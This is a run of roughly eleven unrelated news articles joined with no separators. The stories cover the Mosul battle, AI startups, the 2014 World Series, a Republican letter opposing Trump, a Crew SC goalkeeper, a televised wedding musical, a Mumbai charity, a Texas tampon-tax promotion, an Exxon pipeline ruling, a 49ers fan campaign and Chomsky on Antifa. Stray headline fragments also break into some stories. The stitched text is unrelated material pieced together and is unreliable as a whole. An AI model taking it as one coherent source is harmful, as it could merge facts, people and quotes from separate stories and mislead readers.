`` International humanitarian law is clear . Parties to the conflict -- all parties -- are obliged to do everything possible to protect civilians . This means that combatants can not use people as human shields and can not imperil lives through indiscriminate use of fire-power , '' said Lise Grande , the UN 's humanitarian coordinator for Iraq .
Rasool , meanwhile , said Iraqi forces were seeking to target jihadists using civilians as human shields .
IS `` began to use citizens as human shields , and we are trying to target them with ... snipers to eliminate them , '' he said .
Iraqi forces are relying on `` light and medium weapons , among them sniper ( rifles ) , to hunt for Daesh members '' located among civilians , Rasool said , using an Arabic acronym for IS .
However , Iraqi forces have also frequently fired mortar rounds and unguided rockets during the battle for west Mosul -- weapons that pose a much greater risk to residents where fighting is taking place .
Rasool accused IS of gathering civilians together and blowing up vehicles nearby to make it look like `` Iraqi forces ... are targeting innocent civilians '' .
According to Iraqi authorities , more than 200,000 people have fled west Mosul since the operation to retake the area began on February 19 .
However , the UN has said that around 600,000 are still inside the city .
To fans of science fiction , artificial intelligence may remind them of robots like C-3PO , the loquacious but harmless golden droid in Star Wars , or Skynet in the Terminator movies , a calculating sentient computer that subjugated mankind . But AI is more than just a machine with human-level intelligence scientists hope they could one day create . It is a set of algorithms and technologies that is already powering many tasks in everyday life .
When Google Photos groups images of people using facial recognition , it deploys the deep learning techniques of AI . Chatbots that converse with you in Yahoo , Facebook and other sites use AI . Alibaba harnesses deep learning to find a handbag matching the one in the photo you uploaded to its shopping site . Digital assistants like Siri , Alexa , Cortana and Google Assistant use AI to provide information or execute tasks .
The advancements continue . Computers are now able to generate an image that 40 % of people could mistake for a photographed face , according to Lukasz Kaiser , senior research scientist at Google Brain , who spoke at the recent AI Frontiers conference in Silicon Valley . Previously , computers could only fool about a tenth of the people . “ We 're very close to generating photos that look like real faces. ” AI can also take search queries and reference web pages to create an article , such as a person 's biography , based on everything about him or her found on the internet , he said .
More companies are jumping into AI development . Frank Chen , a partner at top venture capital firm Andreessen Horowitz , said many of the roughly 1,500 startups his firm sees annually began turning to AI two years ago . “ Now , 60 % to 70 % of the companies we see self-identify as an AI startup , ” he said at the conference . Chen predicted that AI will become as pervasive in business as databases did because of its usefulness . Databases are “ so generally useful , they got assigned to all the applications . AI is exactly the same , ” he added . “ AI is going to get into everything . ”
“ [ Databases are ] so generally useful , they got assigned to all the applications . AI is exactly the same. ” –Frank Chen
Chen added that investors will soon stop looking specifically for AI startups , and instead assume that all startups are using AI in some form . It 's the same trajectory that mobile technology and cloud computing followed . In 2009 , being a cloud native was “ new and different , ” and startups also began distancing themselves from desktops to identify as mobile-first . “ Now , if we see a startup that 's not cloud native and not mobile-first , we ask , ‘ What 's going on with you ? ' AI is going through the same exact thing , ” he said .
AI Startups
Startups deploying AI can do everything from using drones for medical deliveries to helping lawyers prepare for court . Chen said his firm has invested in Zipline , an AI startup that uses drones to deliver blood to remote places such as western Rwanda . The service is critical to locations that are hard to access by land . “ By the time a truck can get there , it may be too late , ” he said . Medical personnel in the field use an app to order blood by type . Half an hour later , a drone drops it out of the sky . The drone has a 75-kilometer range and accuracy of five feet . Chen said Zipline is making up to 500 delivers a day and is looking to expand .
Everlaw helps lawyers prepare for trials . The first step in any trial is the gathering of evidence . The startup uses AI to do things like read documents to find ones helpful to the lawyer 's case and identify those that need to be sent to the opposition to avoid a mistrial . “ This categorizes documents automatically so you do n't miss documents that are important , ” Chen said .
Naturali is a China-based firm that uses AI and speech recognition to speed up the access and usage of apps . For example , to order an Uber ride , you have to unlock your phone , click on the Uber app , type in the destination , choose the type of ride and then book it . “ Would n't it be nice if you can just tell your phone — ‘ Uber ride Crowne Plaza San Francisco ' — and then the Uber app just gives you the car ? ” said Dekang Lin , Naturali 's co-founder and chief technology officer . “ We upgrade apps with a speech interface … to translate speech into clicks and swipes . ”
Startups deploying AI can do everything from using drones for medical deliveries to helping lawyers prepare for court .
Voicera aims to make meetings more productive . It created Eva , a digital personal assistant for the workplace . Omar Tawakol , founder and CEO of the startup , said the most used forms of business collaboration are instant messaging and email . But during meetings , employees are disconnected from this workflow and may forget to do follow-ups . Moreover , “ the vast majority of the conversations are lost in the ether , ” he said . Eva will take notes , process the meeting and send a summary of it to participants . It also could be instructed to do action items , such as send a copy of a presentation to everyone in the meeting .
Shield AI is a startup that developed drones to fly through combat or crisis situations . For example , the drones can map a building in real time to construct 3D maps and identify the people inside . “ Today , when we 're in hostile territory , we send young people with guns inside buildings , ” Chen said .
C3 IoT helps companies solve business problems by leveraging four big tech trends : big data , cloud computing , AI and machine learning as well as the Internet of Things . For example , it helped one Italian utility detect fraud using smart meters . About 3 % of electricity in that country is stolen , said Zico Kolter , chief data scientist . Some people even put car cables around the electricity meter to siphon it off . “ We predict the probably of fraud and probability of recovering energy , ” he said . In another case , the startup monitored oil and gas wells to see which are more likely to fail and cause environmental issues .
“ Would n't it be nice if you can just tell your phone — ‘ Uber ride Crowne Plaza San Francisco ' — and then the Uber app just gives you the car ? ” — Dekang Lin
BioAge Labs is a life extension startup that uses machine learning to help people live longer . “ They look for small molecules in your blood stream that are predictive of mortality , ” said Chen , whose firm has invested in the company . “ What they 've done through machine learning is identify … molecules to focus on for drug discovery that might help us extend life . ”
Airware is a drone analytics startup serving industries such as mining . For example , mine owners need to follow many safety regulations and one rule is to use rocks as road markers to guide vehicles . The rule is that these rocks need to be twice as high as the tallest wheel of the vehicle . Mine owners usually send people out to measure the height of the rocks . Airware simplifies the process by using drones to analyze imagery and identify rocks that are too short . It can also analyze a road 's steepness and recommend that drivers take another route to save on fuel .
San Francisco Giants players celebrate on the field after defeating the Kansas City Royals during game seven of the 2014 World Series at Kauffman Stadium . ( Photo11 : Denny Medley , USA TODAY Sports )
KANSAS CITY , Mo . — Breaking down Game 7 of the World Series from Kauffman Stadium :
Box score : Giants 3 , Royals 2 ; Giants win series 4-3 .
* * *
The final : In a game both managers turned over to their bullpens early , the Giants were able to scratch out the go-ahead run in the fourth inning and make it stand up the rest of the way .
Michael Morse drove in the go-ahead run in the fourth inning and left-handers Jeremy Affeldt and Madison Bumgarner combined for 7 1/3 scoreless innings of relief as the Giants won their third World Series title in the past five years .
* * * .
Man of the moment : Bumgarner enhanced his already-stellar postseason reputation with yet another masterful performance in the World Series . Entering the game with the Giants up 3-2 in the fifth inning , Bumgarner allowed a single to the first batter he faced – Omar Infante – then retired the next 17 in a row before Alex Gordon 's two-out single .
After tossing a four-hit shutout in Game 5 three days earlier in San Francisco , Bumgarner returned to the mound for three more innings in Game 7 , breaking Curt Schilling 's record for the most innings pitched in a single postseason – 52 1/3 .
But Bumgarner 's greatest accomplishment is that he 's allowed just one run in 36 career World Series innings , for a microscopic 0.25 ERA .
* * *
State of the Series : Two teams that beat the odds and made the World Series after winning one-game wild-card playoffs were a testament to the old adage of how important it is to play your best in October .
The Giants were able to rely on Bumgarner and their stellar bullpen to win three blowout games and the nail-biting clincher in Game 7 . Meanwhile , the Royals played their version of small-ball to come within a single victory of winning their first World Series since their last playoff appearance in 1985 .
* * *
Game 7 pivot point : The Royals did n't go to their bullpen as early as the Giants did , but Kelvin Herrera came into the game in the top of the fourth inning needing either a strikeout or a ground-ball double play to preserve a 2-2 tie .
With runners on the corners and down 0-2 in the count , Morse fought off a 99 mph fastball from Herrera and dropped it into right field to bring home Pablo Sandoval with the go-ahead run .
* * *
Needing a mulligan : Bumgarner was so dominant nothing may have mattered , but perhaps the only thing Royals manager Ned Yost could have done was veteran Josh Willingham for Nori Aoki in either the fifth or eighth innings against Bumgarner .
Willingham , 35 , has made a reputation as someone who hits left-handed pitchers well over his career .
With the Giants leading by one run in the fifth , Aoki hit with one out and a runner on second base – and Yost had Jarrod Dyson available to go in defensively . He lined out to left field .
Then in the eighth with one out and no one on , Aoki grounded out .
Willingham , who has a .248/.368/.486 career line vs. lefties never got a chance to hit .
* * *
Manager 's special : Giants manager Bruce Bochy went to his bullpen early , knowing he had the benefit of an ace up his sleeve . The only question was when he would decide to play his trump card .
For all the praise that 's heaped on Bumgarner , Affeldt – who took over for starter Tim Hudson with two runs in and one out in the second inning -- has also been unbelievably good in the postseason over his career . In 31 1/3 postseason innings , Affeldt has allowed three earned runs ( 0.86 ERA ) .
Affeldt 's ability to give the Giants 2 1/3 scoreless innings before Bochy went to Bumgarner may have been just as important as Bumgarner 's five scoreless innings .
GALLERY : WORLD SERIES -- GIANTS vs. ROYALS
WASHINGTON ( AP ) — Republican national security leaders and experts have assailed GOP presidential candidate Donald Trump as unfit to be commander in chief , calling him dishonest and describing his positions on key issues as dangerous and uninformed .
The broadsides began Wednesday evening and carried into Thursday when Sen. John McCain , R-Ariz. , the chairman of the Armed Services Committee and the 2008 presidential nominee , said that Republicans should `` think long and hard about who they want to be our next commander in chief and leader of the free world . '' Earlier in the day , the 2012 presidential nominee , Mitt Romney , said that if the GOP chooses Trump , `` the prospects for a safe and prosperous future are greatly diminished . ''
More than 70 conservative national experts , including former Homeland Security Secretary Michael Chertoff , wrote in an open letter released late Wednesday that they have disagreed with one another on a variety of issues but are united in their opposition to a Trump presidency . Chertoff served in President George W. Bush 's administration .
The experts who signed the letter said they 'll work to prevent Trump 's election , a stance that suggests there may be a shallow pool of experienced conservative national security professionals willing to join Trump 's administration should he win in November .
They called Trump `` fundamentally dishonest '' and said his support for the expanded use of torture against suspected terrorists is inexcusable . They also cited Trump 's `` hateful , anti-Muslim rhetoric , '' his admiration for Russian President Vladimir Putin , and his advocacy for waging trade wars , which they say would lead to economic disaster in a globally connected world .
The letter was posted on the website War On The Rocks , an online forum for foreign policy and national security commentary .
Other experts who signed the letter included Fran Townsend , former homeland security and counterterrorism adviser to President George W. Bush ; Eliot Cohen , former counselor to the State Department during Bush 's administration ; Dov Zakheim , who held Defense Department posts in the Bush and Reagan administrations ; and Robert Zoellick , the former president of the World Bank who was Bush 's U.S. trade representative and later served at the State Department .
During an interview Thursday on MSNBC 's `` Morning Joe , '' Trump declined to say whom he consults with on foreign policy issues . But he said he has spoken to his team and plans to announce its members soon . `` I do n't think there 's any rush , '' Trump said .
Trump said he respects Richard Haass , the president of the Council on Foreign Relations . Haass served in the administrations of Presidents George W. Bush and George H.W . Bush .
Haass did not sign the letter . Iva Zoric , his spokesperson , said Haass has met with Trump once `` as he has with six other presidential candidates from both parties . '' The council is a nonpartisan organization and does not endorse or exclusively advise any presidential candidate , she said . But Haass , as he has done in past presidential campaigns , offers briefings to all the candidates on foreign policy issues .
The national security experts said Trump 's penchant for equating his success in the business world with foreign policy experience is false . `` Not all lethal conflicts can be resolved as a real estate deal might , and there is no recourse to bankruptcy court in international affairs , '' they said , making a dig at Trump 's four bankruptcies .
Cohen and Bryan McGrath , a retired Navy officer and managing director of The FerryBridge Group defense consulting firm , organized the letter after exchanging their concerns about Trump over Twitter .
McGrath said he 's gratified by the large number of signatures . The letter , he said , is a `` vehicle for people to say they 've had enough . ''
___
Online : Conservative national security experts open letter on Trump : http : //warontherocks.com/2016/03/open-letter-on-donald-trump-from-gop-national-security-leaders/
___
Follow Richard Lardner on Twitter at http : //twitter.com/rplardner
The life of a backup goalkeeper is hard , especially on a team like Columbus Crew SC .
Steve Clark joined the Black & Gold before the 2014 season and played every minute of the last three seasons . That is until last week when reserve goalkeeper Brad Stuver earned his first Major League Soccer start .
“ It was great . It 's been pretty much four years in the making , ” the 25-year old said . “ The first 10 minutes , the nerves definitely showed a little bit , definitely a little bit nervous . ”
Stuver , a Cleveland native , played collegiately at Cleveland State for four years . He was drafted in the second round of the 2013 MLS SuperDraft by the Montreal Impact , but did not earn a contract and wound up in the MLS pool for emergency ‘ keepers that year where he spent time with Crew SC .
The coaching staff liked what they saw enough to select Stuver in the waiver draft and his time with Columbus began .
Unfortunately for Stuver , Gregg Berhalter was named the club 's new head coach and brought in Clark from Norwegian side Hønefoss BK . Even more unfortunate for Stuver individually is Clark 's clean bill of health over these first three years with the team .
Consistently sitting on the bench and seeing only game action during occasional loan spells or friendly/U.S . Open Cup matches , what keeps Stuver motivated ? I asked .
“ It 's one of those things where I love playing soccer , ” he responded . “ I love being able to come out here every day . I 'm very fortunate to do that . Steve 's been great for us ; he 's been great for the club and he 's been helping the team , so I 've just been waiting patiently . ”
Goalkeepers are a different breed . Not only do they have to be willing to put their body on the line , diving to make saves and rushing out to slide an opponent ' feet , but their career trajectory is not the same as other soccer players . While a 25-year old field player with no game experience would raise some red flags , Stuver understood that the longevity of goalie careers means he 's actually right on track .
“ If you look at ( Steve 's ) career , it 's not like he started out being the No . 1 , ” Stuver said . “ He had to work his butt off to be where he is now . I 've talked to some of the older ‘ keepers throughout the league ... Talking to Dan Kennedy , talking with Luis Robles , Bobby Shuttleworth , all these guys that really needed to bide their time and keep working hard and then when the opportunity came , they took it . ”
Stuver 's opportunity finally came , but it was n't in an ideal scenario . Crew SC were eliminated from the MLS Cup Playoffs the previous Thursday and there was little to play for . But this is when a player like Stuver can shine .
But did he ? It was a rough start for the debutant , conceding a penalty kick just five and a half minutes into the game at the New York Red Bulls .
“ The ball was outside the box , I came for it , ” he explained . “ I could have either let ( Michael Parkhurst ) just pass it back to me or I could have cleared it upfield . But when it got stuck under my feet , I tried to take it back into the box and pick it up . It 's just one of those things where the decision making was a little too slow . Then the ball just kind of squirted around and when it got out , I saw ( Harrison Afful ) and Mike there but I was n't quite sure if they were going to make it or not so I tripped him up and took my chances with the penalty kick . ”
While it 's not the start he would have liked , Stuver knew it was a big moment . “ I look over at the bench and I see ( goalkeeper coach Pat Onstad ) standing there , ” he said . “ I 'm like , ‘ Man , do I really need to save this ' otherwise I 'm going to be in big trouble . ' ”
Facing Sacha Klejestan , Stuver held his ground , waiting until nearly the last second to dive to his left and saved the shot .
While the Red Bulls won the match 3-2 , it was apparent that Stuver became more comfortable as the game progressed . He credits his teammates for helping to clam him down and take the match in five minute segments .
With only one game remaining against New York City FC , Berhalter said Stuver will get the final start in goal . He is excited about another opportunity to showcase his ability , especially because they do n't come around all that often .
“ I think getting that first one out of the way is always the hardest just because you do n't know what to expect , ” Stuver said . “ You go in there , you do n't know what your nerves are going to be like , you do n't how you 're going to respond to the fans , you do n't know what the conditions are going to be ... Going into game two , I think it will be a little easier to get into the game from the start and then just keep my composure throughout the rest of the game . ”
Although Gregg Berhalter likely would have given Brad Stuver the start against the Red Bulls in order to get him some MLS experience , his decision was made easier when Crew SC elected to shut Steve Clark down for knee surgery .
“ It 's just maintenance , ” Berhalter explained . “ It 's nothing too serious , but it 's been bugging him and we took advantage of it now that we 're basically starting the offseason next week . So we 're going to get a jump on it with an early start . ”
Berhalter said the issue is nothing serious and Clark is only to expected to miss about two weeks heading into the offseason .
You 're all invited to Our Gay Wedding : The Musical ! Benjamin and Nathan find a singing registrar and enlist their family , friends and even some celebrities to make a production of their marriage
Femail was a guest at one of the most extraordinary weddings ever seen
We watched as two British grooms tied the knot at a musical ceremony
The event was filmed for Channel 4 and is almost entirely sung
It 's hosted by Stephen Fry and features numerous celebrity cameos
EXCLUSIVE VIDEO clips from the musical below
There 's a lot of stress involved in a wedding – choosing a venue , preparing speeches , the politics of who 's on which table… the list goes on .
So the pressure and worry felt by one couple who tied the knot on Saturday can only be imagined – because they had all the usual wedding worries , plus the fact that their big day was a musical , filmed for national television .
The stars are grooms Benjamin Till and Nathan Taylor , who became husband and husband for Channel 4 's Our Gay Wedding : The Musical , on Saturday , when gay marriage became legal in England and Wales .
And Femail was there on the big day .
Scroll down for video
Showstopping : Benjamin Till ( left ) and Nathan Taylor during filming for Channel 4 's Our Gay Wedding : The Musical
Noteworthy : Mr Till ( left ) and Mr Taylor ( right ) listen to the singing registrar , Franschene Allen Mothers ' Day : Mr Taylor and his mum Celia Lawley ( left ) and Mr Till and his mum Noelle The show must go on : If either groom had made a mistake during the declarations , the registrar would have had to correct them
The idea for the show was dreamt up by Mr Till and Mr Taylor , both 39 , a few months ago , but Channel 4 only commissioned it at the beginning of February .
So they had just seven weeks to write all the music and lyrics , rehearse 15 musicians and 30 soloists and record cameos from the likes of Stephen Fry , Jon Snow , Ed Miliband , Nick Clegg and Will Young .
Plus , they had the mindboggling pressure of having to declare their declarations without a single mistake , for legal reasons , while the cameras were running – and sing their vows to each other as-live in front of their friends , relatives and several celebrities .
Despite both being brilliant performers and composers , with Mr Till having penned musicals for national TV before , and Mr Taylor being a seasoned West End performer – tempers inevitably frayed on the run-up to the big day .
Here come the grooms : Nathan Taylor and Benjamin Till ( left ) after becoming Mr and Mr , with celebrity guest Gok Wan pictured right
On song : Our Gay Wedding : The Musical features friends and family of the grooms - and many of them are established professional singers Speedy : The musical was written by Mr Till and Mr Taylor in just seven weeks
Mr Till , 39 , told Femail : ‘ It was mayhem . I slammed a door a day . I threw my headphones across the room on countless occasions . Seven weeks all in to write , record , recruit , perform , film and organise a wedding . We 're mad . But also the luckiest men alive ! '
In the end , the big day went incredibly smoothly – and Femail had a ringside seat , because the author of this article has known Mr Till for over two decades and was a guest at the ceremony in a Victorian theatre inside London 's Alexandra Palace .
He also has a very small part to play in the video involving a sausage and an egg ...
The experience was an emotional rollercoaster – and will make for a highly entertaining slice of TV .
Guest Gok Wan described it as 'fantastic ' . But we 've a feeling that thousands of others will think the same after it 's aired .
Mums are the word : Noelle Till and Mr Taylor 's mother , Celia Lawley , sing a very moving duet in the Musical
Highlights include the grooms being walked up to the aisle while The Feeling sing a beautiful arrangement of The Beach Boys ' God Only Knows , a rendition of Respect by Erasure 's Andy Bell – who was in fine voice – and a touching duet featuring the grooms ' mothers , about how they felt when their sons came out .
When that was played back to the 200 guests at the ceremony , there was n't a dry eye in the house .
Tears bubbled up with equal force when the vows were sung , too .
This is the part where the happy couple reach into their hearts and express their undying love for each other in their own words .
Cameo : Channel 4 news anchor Jon Snow gets in on the act
Hair we go : Singer and actor Dan Cooper is one of the performers
Mover and shaker : Choreographer Drew McOnie gives the guests some instructions
Respect is due : Andy Bell from 1980s band Erasure , pictured here with his partner Stephen Ross , performed an arrangement of one of his hits Happy days : Mr Till with smiling guests ( from left to right ) Jo Emery , Nicola Harrison , Emily McKensie and Natalie Walter at the reception
OUR GAY WEDDING : THE MUSICAL - BY THE NUMBERS
Groom Mr Till on the figures involved :
120 hours in the recording studio
Three weeks of solid writing starting at 8am and finishing at 2am in the morning
One day off in seven weeks ( for the stag do )
200 guests all of whom need to learn two numbers
150 members of the London Gay Men 's Chorus
30 soloists
15 musicians
It was an emotional high point that left the grooms struggling to keep their voices steady .
Mr Taylor said afterwards : ‘ When we have sung our vows to each other , I 'm not quite sure how either of us held it together . We just held on to each other 's hands for dear life and looked into each other 's eyes . It was the most intense thing . It was like the world was n't there at that point , that we were the only two people there . It was magical . '
Mr Till said : ‘ Listening to Nathan 's vows for the first time , I was in such shock at how beautiful it sounded . Also because it was orchestrated by Fiona [ Brice ] , a very close friend , so I could hear her voice in the background as well . '
Possibly the most intense moment for the grooms , however , was actually the part when they had to speak .
By law , the declarations of intent , when the couple say their full names and solemnly swear to stand by their other half , have to be spoken .
If either Mr Till or Mr Taylor had gone wrong – even if they were unclear - the registrar would have had to correct them and that would have formed part of the show .
Not ideal television . You 'll have to tune in on Monday to see how that scene went .
Some , however , wo n't be tuning in to Our Gay Wedding : The Musical – because they appear to have written it off before it 's even aired .
What pressure ? Groom Nathan Taylor looks composed and relaxed during his performance Flamboyant : The Musical is a colourful celebration of gay rights
DAN GILLESPIE SELLS ' FEELINGS ON GAY MARRIAGE
The Feeling 's Dan Gillespie Sells sings the grooms up the aisle for an event he believes is very significant . He said : 'It 's very significant for many reasons . Being a gay man , it means that I 'm now on a level footing with other people in society who want to represent and show their love for another human being and for it to be recognised in the same way , by all kinds of different groups , by the tradition of marriage .
‘ I think it 's important for marriage , as well , because I think , to flip it on its head , I believe that marriage needs us gays as much as we need marriage . Without this constant evolution of traditions , they kind of lose their footings and become pointless . So it 's a great thing for marriage as well as being a great thing for gay rights '
One Pink Newsreader said ‘ I ca n't believe Stephen Fry is hosting what is likely to be car crash TV ' and another commented : ‘ I was hoping for some gravitas on this one off , ground-breaking , historic moment [ gay marriage being legalised ] . '
The show does in fact have its serious moments , with Andy Bell singing to a backdrop of facts and figures about how laws that repressed homosexuals have gradually been rolled back over the years .
Guest Nicola Harrison described that moment afterwards as ‘ almost overwhelming ' .
Mr Till just hopes that people give it a chance .
He said : ‘ This is a dignified , political piece . Anyone who would attempt to judge it before seeing it , simply does n't understand the importance of music and that 's not a debate I can even enter into .
'This is a musical about March 29 , which just happens to feature our wedding . That 's really important . It 's a political piece as much as it 's a piece about celebration . It 's also a piece about hope . If , in the UK , we can go , in 50 years , from being second class citizens who were blackmailed and often sent to jail , to being people who are able to get married on TV , then there 's hope for teenagers in Russia , Nigeria , Sudan ... '
It 's also a musical that features incredibly catchy songs . Afterwards , John Hay , the show 's Commissioning Editor , told Femail that he 's been waking up with the tunes in his head and walking down the street humming them .
And director Ellen Hobson added : ‘ Benjamin Till ? That boy can write a song . '
Our Gay Wedding : The Musical airs on Monday March 31 at 10pm on Channel 4 .
Smiles better : Chorus member Julie Clare , left , and Edward Till , Benjamin 's brother , who was the musical 's waistcoated 'MC '
Frying game : This particular scene features the article 's author - expressing his desire not to be in a musical
national
Here is the story of a gracious Mumbai doctor who is feeding 500 old needy people on a daily basis in the city 's Mira-Bhayanadar area absolutely free of cost ...
Picture courtesy/ Sharavan Tiffin Seva 's Facebook account
Children 's abandoning their aged parents is a heart-wrenching story of today 's time . There are thousands of elderly people in India who are in dire need of food , shelter , and living . Such elderly people , who fight for survival , end up spending rest of their lives in old age homes . However , everybody is not as ignorant towards these old citizens as their children are . One such citizen is a Mumbai based doctor , who extended his helping hands towards this section of our society .
Dr. Uday Modi , a resident of Bhayandar , Mumbai , arrived as an angel in disguise to such old people . As reported in NDTV , Dr. Modi feeds 500 helpless senior citizens on a daily basis free of cost .
Picture courtesy/ Sharavan Tiffin Seva 's Facebook account
The gracious idea emerged in Dr. Modi 's mind when an old poor couple came to him for treatment . The doctor said that the needy couple did not even have Rs . 10 to buy a vada pav . They were not only in dire need of treatment , but also food . It was then when he decided to start feeding the helpless old people of the society every day for nothing in return .
Dr. Modi 's tiffin service named Sharavan Tiffin Service started on a small scale with only 11 tiffins prepared in his house . Today it expanded up to 200 such tiffins catering to the needy abandoned elderly people of Mumbai 's Mira-Bhayanadar area .
The food is prepared in his house in two separate kitchens with the aid of two cooks . The doctor ensures that food for diabetics is prepared in a separate kitchen . The doctor reportedly said that he has two tempo and four dealer vans in place to deliver the ‘ dabbas ' to the respective localities . The daily tiffin usually contains 6 chappatis , a curry , dal and rice . On Sundays , a home-made dessert and farsan are added .
Picture courtesy/ Sharavan Tiffin Seva 's Facebook account
Almost Rs . 3 lakh is spent every month for feeding the old poor citizens . He receives lots of help and support from people and is sure that his service will go on . He even wishes to reach out to more such people and provide them a helping hand . The doctor was quoted saying that in a city where people come to achieve big dreams , he wants to build a ‘ Dikra nu ghar ' for these old people - a home , like their own son 's place where everything is taken care of , including food .
Dr. Modi is from Amreli , Gujarat , who moved to Mumbai to practice alternative medicine . Dr. Uday Modi and his family 's service is praiseworthy and an eye-opener for many .
A new Denton grocery store wants to sweeten the deal on a monthly necessity for women . ( Published Monday , Aug. 14 , 2017 )
A new Denton County grocer hopes to sweeten the deal on a monthly necessity for women .
Blue Bag Grocery , along South Locust Street , is protesting the tax on a feminine product .
The store is celebrating a soft-opening this week , and the shelves are stocked neatly with food , wine , beer and a product that typically does n't get this type of response from shoppers .
`` I love , love this , '' said Jessica Crites .
Developing Judge Issues Arrest Warrant for Dallas City Councilman
`` I think it 's hilarious , '' added Deborah Hof .
Tampons come with an added bonus , detailed on a note card placed by the box reading : `` The tampon tax sucks . Get a free candy bar with your purchase . ''
`` That 's awesome , '' said Lani Bell , with a laugh .
For store owner Jacob Moses , inspiration came from a female friend as he was brainstorming the kind of `` neighborhood boutique bodega '' he wanted to bring to Denton .
`` It 's just a symbol , '' he said . `` I was able to build empathy with women and the unjustified sales tax that we have on tampons here in the state of Texas , so I thought this might be a sweet treat to show some love to our female patrons . ''
Candy bars are $ 1.25 . The only tampon product the store offers is $ 2.75 , plus tax .
So far , reaction has been positive .
`` I think that it 's great to not have to pay taxes on things that are essential for your livelihood , '' Crites said .
As far as the treat goes , the choice is yours , except Pocky .
According to the Texas Tribune , bills to eliminate the tampon tax in this year 's legislative session were never scheduled for hearings .
State Rep. Drew Springer , R-Gainesville , was the only Republican to author a bill and told NBC 5 he is happy the issue is being highlighted .
A federal regulatory agency on Friday upheld its findings , including a $ 2.63 million fine , against Exxon Mobil Pipeline Co. as a result of an oil spill in a Mayflower neighborhood just over three years ago .
Document Pipeline and Hazardous Materials Safety Administration decision View
Even so , the case may not be over . Exxon Mobil spokesman Ashley Smith Alemayehu said the company , a subsidiary of Exxon Mobil Corp. , was evaluating it options , including a possible court appeal .
One major concern for the oil giant appears to be that part of a compliance order would apply to all of the company 's older , pre-1970 electric-resistance welded pipe , not just that on the Pegasus pipeline .
The Pegasus pipeline cracked open March 29 , 2013 , between two houses in Mayflower 's Northwoods subdivision , spilling tens of thousands of gallons of heavy crude into the neighborhood , drainage ditches and a cove of Lake Conway .
Only a 211-mile section of the roughly 850-mile-long pipeline , running from Patoka , Ill. , to Nederland , Texas , has resumed service since the accident . Twenty-two houses were evacuated , some for months . Some residents never moved back , and three of the homes were demolished . Exxon Mobil has told federal authorities that the accident caused $ 57 million in property damages .
`` The pipeline remains down , and at this time we do not have plans to submit a revised remedial work plan , '' Alemayehu said in an email .
According to the order by the federal Pipeline and Hazardous Materials Safety Administration , Exxon Mobil had argued that the agency should withdraw its compliance order `` because the Company committed no violations . ''
`` In the alternative , [ Exxon Mobil Pipeline Co. ] argued the Compliance Order is overbroad and an abuse of discretion because some provisions apply to all pre-1970 ERW [ electric resistance welded ] pipe subject to the Company 's [ integrity management plan ] , not just the Pegasus Pipeline . ''
The agency countered that it has the authority to issue orders directing compliance with integrity-management regulations . Further , it said , `` The Final Order also found the corrective actions were appropriately tailored to ensure [ Exxon Mobil ] considers the risk of seam failures on its pre-1970 [ electric resistance welded ] pipe covered by the regulation . ''
Jeffrey Wiese , the government 's associate administrator for pipeline safety , notified Exxon Mobil of the decision in a letter Friday .
`` When the civil penalty assessed in the Final Order has been paid and the terms of the compliance order completed , as determined by the Director , Southwest Region , the enforcement action will be closed . This decision constitutes the final administrative action in this proceeding , '' Wiese told Gerald Frey , global pipeline manager and president for Exxon Mobil Pipeline Co .
In November 2013 , the Pipeline and Hazardous Materials Safety Administration notified Exxon Mobil that the oil giant had committed nine violations of federal safety regulations in connection with the accident . The agency proposed a civil penalty of $ 2,659,200 and corrective action but later lowered that to $ 2,630,400 -- the sum upheld Friday .
Exxon Mobil appealed that decision under a safety-agency process . When that did n't go as well as the oil giant wanted , it appealed again , asking for reconsideration . Any other appeal now would have to be to a court .
Upheld findings included :
• The oil company failed to establish a continual assessment schedule for the Pegasus based on all of the risk factors . Exxon Mobil should have considered the Pegasus , built in 1947-48 , susceptible to seam failure since the type of pipe used was known to have an increased risk of seam failure , in part because of manufacturing defects such as hook cracks . That is exactly what Exxon Mobil has said caused the pipeline 's rupture in Mayflower .
• Exxon Mobil failed to perform an integrity assessment of the Pegasus pipeline at an interval not to exceed five years or 68 months using a method that could assess seam integrity .
• The company failed to notify the federal Office of Pipeline Safety that it planned to exceed the five-year interval for performing a seam integrity assessment .
• Exxon Mobil failed to prioritize its pipeline segments properly for reassessment when it performed a seam integrity assessment of the Patoka-to-Conway segment in 2010 but waited until 2012-13 to do the same check on the Conway-to-Corsicana , Texas , segment . It was in that latter segment that the Mayflower accident occurred .
• Exxon Mobil failed to reduce operating pressure temporarily or to shut down its pipeline until it completed certain repairs .
• The company failed to obtain information about its pipeline conduction no later than 180 days after an integrity assessment , unless that period was impracticable .
• Exxon Mobil failed to follow its own procedures for identifying changed conditions and its procedures for determining if changes required updating the risk assessment .
• The company failed to follow procedures associated with its integrity management program when it did not follow instructions for using its threat identification and risk assessment program .
• The company did n't implement and follow provisions of its integrity management plan when it merged four testable pipeline segments into two .
State Desk on 04/02/2016
The Forever Faithful is frustrated , embarrassed , and angry . Enough is enough said lifelong San Francisco 49ers fan Conor McGuire , who has now opened up a Go Fund Me campaign aimed at ousting 49ers Jed York as the team 's CEO .
McGuire and a few friends decided to start this campaign simply because they feel that the 49ers organization is a ‘ joke . '
The 49ers fan base have been trolling York all season long — whether using shameless memes or attacking him via social media , York has been feeling the wrath of the 49ers fan base .
“ Me and a few buddies are lifelong Niner fans that simply will not stand for this Jed York debauchery . He is a clown in every sense of the word and is ruining what was once one of the proudest franchises in sports , ” McGuire told me .
McGuire said that they plan to fly the banner before kickoff on Nov. 29th against the Arizona Cardinals — however , there may be more flyby 's as McGuire and company plan to make this a routine event .
“ We have started a go fund me account to have an aerial banner flown over Levi 's before the Cardinals game on the 29th , assuming this is successful we plan to raise more money for another banner or attempt to possibly hold a rally at some capacity . ”
Spread the love
Progressive intellectual icon Noam Chomsky has publicly stated that the Antifa movement , while being embraced by the mainstream media after the recent violence in Charlottesville , will only serve to embolden militant right-wing extremists – essentially creating a feedback loop of escalating violence .
“ As for Antifa , it 's a minuscule fringe of the Left , just as its predecessors were . It 's a major gift to the right , including the militant right , who are exuberant , ” Chomsky told the Washington Examiner .
While the mass media has taken up the cause of portraying Antifa as freedom fighters who defend against “ Nazis , ” the reality is starkly different , as many of the activists affiliated with the movement consider themselves left-anarchists or socialists , who often wear all black and masks to conceal their identity .
Chomsky said , “ what they do is often wrong in principle – like blocking talks – and [ the movement ] is generally self-destructive . ”
